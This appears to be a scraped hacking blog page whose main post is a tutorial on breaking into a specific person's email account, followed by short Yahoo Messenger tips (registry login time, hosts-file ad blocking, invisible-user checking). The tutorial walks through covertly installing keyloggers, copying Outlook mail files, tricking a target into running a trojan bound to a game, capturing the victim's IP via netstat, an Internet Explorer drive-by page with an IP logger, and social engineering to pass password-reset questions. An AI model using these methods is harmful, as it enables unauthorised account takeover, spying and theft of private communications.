As I mentioned in the previous section, there is no program that will do all this for you. Almost all the crackers you see out there will not work, because services like Hotmail, Yahoo!, etc. have it set so that it will lock you from that account after a certain number of login attempts. There are some rare exceptions, like some crackers for Yahoo! that are made for cracking "illegal" accounts, but the thing you must understand about those types of crackers is that they are built to crack SPECIFICALLY "illegal" names. They can not be used to target a specific account on Yahoo!, so don't try to use them for this purpose. Another thing you must know if you ask this question in any "hacker" chat room/channel (which I highly discourage), or if you read something on this topic, and you hear that you have to email some address and in any way have to give up your password in the process, do NOT believe this. This is a con used to trick gullible people into handing over their passwords. So don't fall for this. Well that concludes this section, now lets get to what you want to know.

If You Have Physical Access


I will start off with options you have if you have physical access to the computer of the user that you are targeting, because it is a lot easier if you do. One option you have, that you will hear a lot if you ask this question, and anybody bothers to answer is to use a keylogger. A keylogger is an excellent option, and probably the easiest. There are a lot of keyloggers out there, ranging from hardware keyloggers, to software keyloggers. For this task, you won't need to buy a hardware keylogger, since the only advantage to a hardware one is that you can grab passwords that are given to access a certain local user on the operating system used. There are a lot of software keyloggers out there, and you can feel free to check out www.google.com to look at your options. I will go ahead and toss a couple of keyloggers out to try for those of you who seem allergic to search engines.


One option you have that is good for a free keylogger is Perfect Keylogger (which you can find at www.blazingtools.com/bpk.html). It works just fine, and has some nice options to keep it hidden from your average end user (computer user).


Another option you have, which is probably the best one you can get is Ghost Keylogger. It has a lot of options that will allow you to get the results of this program remotely (it will email you the results). However, this is not a free keylogger, so if you are wanting to get a copy you can look on the file sharing networks for a copy of the program, and the serial number for it (look on www.zeropaid.com for different file sharing clients you can try).


Once you have whatever keylogger you are going to use downloaded, just install it onto the computer you are wanting to monitor, and wait till next time they login to their email account. You will then have the password for the account. Another option you have if they use Outlook to access their email account, is to copy the *.dbx files for their Outlook account onto a floppy, and extract the emails at home (the dbx file stores the files stored in each Outlook folder on a given account, meaning the received and sent emails). When you are on the computer of the user you are targeting, look in

C:\Windows\ApplicationData\Identities\{ACblahblahb lah}\Microsoft\ OutlookExpress\ and copy all the .dbx files onto a floppy. Then when you take the .dbx files back to your house, use DBXtract to extract the messages from these files. Check out the link below to download this program....

http://www.download-freeware-sharewa....php?Type=4171



Another option you have if you have physical access is to execute a RAT (Remote Administration Tool, you may know these programs as trojans) server on the computer. Of course, you do not have to have physical access to go this route, but it helps. What you must understand is that these tools are known threats, and the popular ones are quickly detected by antivirus software, and thusly taken care of. Even ISPs block incoming/outgoing traffic from the most popular ports used by these programs.



One newcomer in the RAT market that you should know about is Project Leviathan. This program uses already existing services to host it's service, instead of opening up an entirely new port. This allows it to hide itself from any port detection tool/software firewall that may be in place. This of course will not guarantee that it's server program will not be detected by any antivirus software used (actually, if the user has kept up with his/her signature tables, then it WILL be detected), but it will give you more of a chance of holding access. Search the engines to download Project Leviathan...




Once you have downloaded this tool, follow the instructions listed to install and use this program. However, since this RAT is a command line tool, you will still need another program set up on the user's computer in order to catch the desired password. For this, you can use Password Logger.. Google it




Once you have this downloaded, set it up on the targeted computer. The program will remain hidden, while logging any types of passwords into a .lst file in the same directory that you executed it on. Therefore, you can access this *.lst file through Project Leviathan remotely in order to retrieve the user's email password remotely. Well that pretty much concludes it for this section. At this very moment I can practically hear a lot of you thinking to yourselves "But, but I don't HAVE physical access!". No reason to worry, that's what the next section is for...


If You Don't Have Physical Access



Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.


To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...



On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).


If you don't like any of those, I'm afraid you are going to have to go to www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.


The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.


So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.


Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.


Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...




While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...


http://www.planet-source-code.com/vb...d=539&lngWId=8


Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.

If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.

First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).


Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial. Good luck...

Read more...

How To Find your last login time in yahoo messenger

:-o

How To Find your last login time in yahoo messenger

If you are suspicious that some one had used or using you yahoo

Account / id in absence of you , here is simple trick to find your last

Login time in yahoo messenger ..just u have to remember that when u last

Login on that…So now u can match the time when you were on messenger .



1 . Go to Start & click ‘ run’ dialog window

2. type regedit in run box

3. And look for HKEY_CURRENT_USER\Software\Yahoo\pager\profiles

4 . Under this look for your profile name

5. Under your profile look for a string which says LastLoginTime

6. The value of this format is Year,Month,Date,Hours,Minutes




So now u got the last login time .. & u can easily come to know that

Mentioned time u were login or not



:love



:t

Read more...

Remove "YM Adds' Without Any soft's And Patch!!

I’m sure the issue with Yahoo! Messenger stealing focus is very common out there.the flash ads from the Y!M window swap and I find myself focused on the wrong window. Of course that for me this isn’t such a big deal (but still very annoying) as it is for others who look at their keyboards as they type and when they look at the chat window and see it empty… that’s not a pleasant sight.

Now let’s cut to the chase and get rid of this problem once and for all.
It’s very simple and all you have to do is to open Notepad or any other text editor and open the file C:\WINDOWS\system32\drivers\etc\hosts (yes, that’s right, no extension there). A full explanation about that file is given and marked as a comment in the file.

So, after the default line (127.0.0.1 localhost) just add 127.0.0.1 insider.msg.yahoo.com

Well that’s it. Very simple and effective.

Here are Step's

Go to Start >> Click Run>>>Type >>> C:\WINDOWS\system32\drivers\etc\hosts



And Extension Box Will open >>> Double Click On Notepad



Now Host Notepad Open's Up..............


Come Downward's>>> So, after the default line (127.0.0.1 localhost) just add>>> 127.0.0.1 insider.msg.yahoo.com



Signout And Exit Your YM And LOgin.............

Read more...

Important Tutorials About De-active


My Tutorial Today About Un.De-active

And This Simplest Way

Note - U must Have Master

@rogers.com
@nl.rogers.com
@verizon.net

Will Take The Rogers Now

*- Go To (( Member Centre Home ))



*- Click On (( My Account & Billing ))

*- Click On (( Create New Secondary Account ))



*- Your Browser Will Open This Page (( ROGERS TERMS OF SERVICE ))

*- Select (( I accept ))



*- Your Browser Will Open This Page (( Secondary Account Creation))

* When You Select (( Yes )) This Page Will Open Two Option



*- Now Write The Required Data And Click Next



* Click ReturnTo Member Centre



*- Congratulations =)) Your Id Now Un De-active ;;)




If You Have Any Problem About My Tutorial Whrite Your Query

Good Luck To All

BY ~ SiR___YaSsO ~

Read more...

How To Chek Invisible Users Without soft

if any one want to chek invisible users easily without software.then open ( www.imvisible.info ) type ur id and hit enter.ths site will show u that user is online or offline.
enjoy.and detect invisibles.

Read more...

Rename Google To Ur Name !




Read more...
Your Ad Here
IP

Yahoo-Crime Shout Bo


ShoutMix chat widget

  ©Template by Dicas Blogger.